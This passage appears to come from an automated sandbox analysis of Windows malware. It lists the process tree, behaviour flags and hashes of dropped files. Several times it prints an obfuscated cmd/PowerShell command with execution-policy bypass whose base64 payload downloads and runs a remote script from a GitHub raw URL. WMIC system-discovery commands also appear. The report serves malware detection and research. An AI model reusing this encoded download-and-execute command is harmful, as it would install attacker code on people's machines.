  [2] C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\cmd.exe
    cmd.exe /C wmic CPU get NAME
  [2] C:\Windows\System32\Wbem\WMIC.exe
      wmic CPU get NAME
      - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\cmd.exe
    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [2] C:\Windows\system32\cmd.exe
      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        - Blocklisted process makes network request
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\RESA78B.tmp
  MD5     5ffc8022f7dca3f3fe9f6404b97885b3
  SHA1    c900bf19d0cec348e3b03c304fe9b38e09c94b04
  SHA256  03bd353d66aff99b2e15ffe4c5602561c627a395a4e7cfb43c656f9ef6072e2c
  SHA512  d4c5db4bbf4c0e143e4eb5b04485a64be31eb43c7144a738829dc52f82ce15e28695eaba2dd013ffbdb2c8c43a78a5792bb74286e8ad4b34c3a4803ed4b5687e

C:\Users\Admin\AppData\Local\Temp\RESAD77.tmp
  MD5     61baf1e29429e277b58293586f4b54d0
  SHA1    865b60916d313059a67db1b099b4f5676dac9a7f
  SHA256  56440390b1b06339fc4039148e654d814fdfcdfd5084d0c2494f7810ffd92175
  SHA512  9c2e58571c5d7c879dcc04cb66255134579b3b8fa028e8a8c8d0bb09cd5d38e66f951498151a2076fea89bf26979e67140dcc637f181642c6874d947d876a9ff

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
  MD5     906cfa662334c891a46689a3f1da9330
  SHA1    eeea78f5017291d2bcc9455977849c075077a14a
  SHA256  5d411460ba068d64bdafd0c3697d1bbe19685789c1c086d6b6e9073fbb914275
  SHA512  7d25845ca882e48df6c2b9c8646990d5dcc396f60c587e5fafce1841624b009d44542e93488a71983c9d8f71c9a001b06d4602b8be6f958435753490f8a7196f

C:\Users\Admin\AppData\Local\Temp\ready.ps1
  MD5     28d9755addec05c0b24cca50dfe3a92b
  SHA1    7d3156f11c7a7fb60d29809caf93101de2681aa3
  SHA256  abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
  SHA512  891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

C:\Users\Admin\AppData\Local\Temp\tcsoktj1\tcsoktj1.dll
  MD5     8949f891fd5c4bd43ec267d70039e43d
  SHA1    95951fbd24f258f2dce531e98844f1f91ee4dacb
  SHA256  ebb92517328a31e522cb30152686330f66969d37458ec0a156c5eb2b25e125c3
  SHA512  2802f5ebf8e51ba562b59f1fdf90f8c203c0f31ea45d1c7da58b251be2fc250f17a583fad2c307dec59dcdcc3c0b035155e0cad5f0111fe629c72df2739de61e

C:\Users\Admin\AppData\Local\Temp\ysa2i5ni\ysa2i5ni.dll
  MD5     962faacb74d4257e90d8affde3134a97
  SHA1    7a2c28bd66672c423a189abc5f2dddc2972d867e
  SHA256  66c24ab3956f297e9f5ab6295658fe1dc9f5a7d28e15ba505e42a0dd6a626911
  SHA512  35eb3fd1898aac3f119af5fbb47be5fb600c5adebac3e6eec35fe4e0c3994b63323249cdf25feb412ec7c8cecec65f05d8d257e3b1805721d8ff90791a0029d7

\??\c:\Users\Admin\AppData\Local\Temp\tcsoktj1\CSC2D2376043F0E43B4AAFAFCE07CD4643.TMP
  MD5     9fdc502fbdac73694ca152e18e2906cb
  SHA1    e7033b7c87f39bd7df23419a6061d8a76f30a281
  SHA256  5d061933f05ee0cd73effbe37956104731147e1484f658b0b4fee673ddc12bd0
  SHA512  85d8c6d4084617715c523f6ab9b8cc038925490911e8bd9f26a45a996e929bea834fa8e0a8860cb5cbf11b140227cc6922d2793dd45fc3ffa8ab66617db057d5

\??\c:\Users\Admin\AppData\Local\Temp\tcsoktj1\tcsoktj1.0.cs
  MD5     e0f116150ceec4ea8bb954d973e3b649
  SHA1    86a8e81c70f4cc265f13e8760cf8888a6996f0fd
  SHA256  511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
  SHA512  32f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec

\??\c:\Users\Admin\AppData\Local\Temp\tcsoktj1\tcsoktj1.cmdline
  MD5     ed93f3a391533a10becf9eb24caf0e30
  SHA1    e038f5fc24363ab246907a1e329c809fb7e38251
  SHA256  29e634e47ab6b85fdfd91c9e32555dede9e237932f8cb515516117c14a887fd9
  SHA512  840470dd197ce50c3e72082af5bf993e265337a415c43685b1f20cd6d424998edb7efa898487f7089294bbcdff36b2989442e67d8f870b0b47a64865f2239109

\??\c:\Users\Admin\AppData\Local\Temp\ysa2i5ni\CSC27CACF1B9A6548F784A5D2794A43D262.TMP
  MD5     4fbfd005c3465e4ca5b9c8fa003cb9c5
  SHA1    31e53773310c41d1e516fd93784f2a40cb435953
  SHA256  2423d8642f8f1e70fa9ed8af3ec7667ff31f74328e5032b52264d69bb76e70f2
  SHA512  27a795f4adff9589aa479b81d186f8be3c8b63d65d1cbdfce8851972d859dfda9c5c6b55fa09de01422fb38bf08c85ca4128d0a91b7a53061e2142750d9a8e7c

\??\c:\Users\Admin\AppData\Local\Temp\ysa2i5ni\ysa2i5ni.0.cs
  MD5     9f8ab7eb0ab21443a2fe06dab341510e
  SHA1    2b88b3116a79e48bab7114e18c9b9674e8a52165
  SHA256  e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
  SHA512  53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

\??\c:\Users\Admin\AppData\Local\Temp\ysa2i5ni\ysa2i5ni.cmdline
  MD5     e9e6879a9433c28ea29428f095a98f62
  SHA1    d1cb8d7735f1f0e0bee30a92b1092b6577b96bfa
  SHA256  ef05f5e5a88d8909a9327f11f995dc725fe64ec3bfd17571a044c5719ccd0695
  SHA512  cea57b366d25a6b6de5e7209602b66d29270596aa286389360ece781035c06fad71bd729f08f27246a6183dfd417c73ecf09e0810ff0cf3cc8480ca4a342864e

\Windows\Branding\mediasrv.png
  MD5     b5a099246bec080e384b19fff56bb2cc
  SHA1    6f26990f3f471717c97dca80a2ccbf2eac952280
  SHA256  352fa41bf3319718aa0346e6feb3032c10241ca746ffd8acfe7cf5fe222be991
  SHA512  69dd0038b5911eb8a239262605283e1854b3a9c32da7665990cc2d38572c28f33f63ef3286abf85b82378e2cc791cb208e5de2e2c263286f088c6d9239060604

\Windows\Branding\mediasvc.png
  MD5     cc59270baf11196c3414204c319f3be9
  SHA1    038e2aa526fad8eb762e21e9aed7eab4531d4e11
  SHA256  5c5890fdbc0c59e911168a0b618436e8fb76be6053ab0bfa2eec4f7f0e9267e6
  SHA512  8e54a2a636d2b745a9d8e0e51fd54ccb504ec348f86730b951c45feb21f743be448401f72f6d3498a78a9aa6eb4d46211c424fe8c8cb3eeaf6f2d8bc5dd6a632
-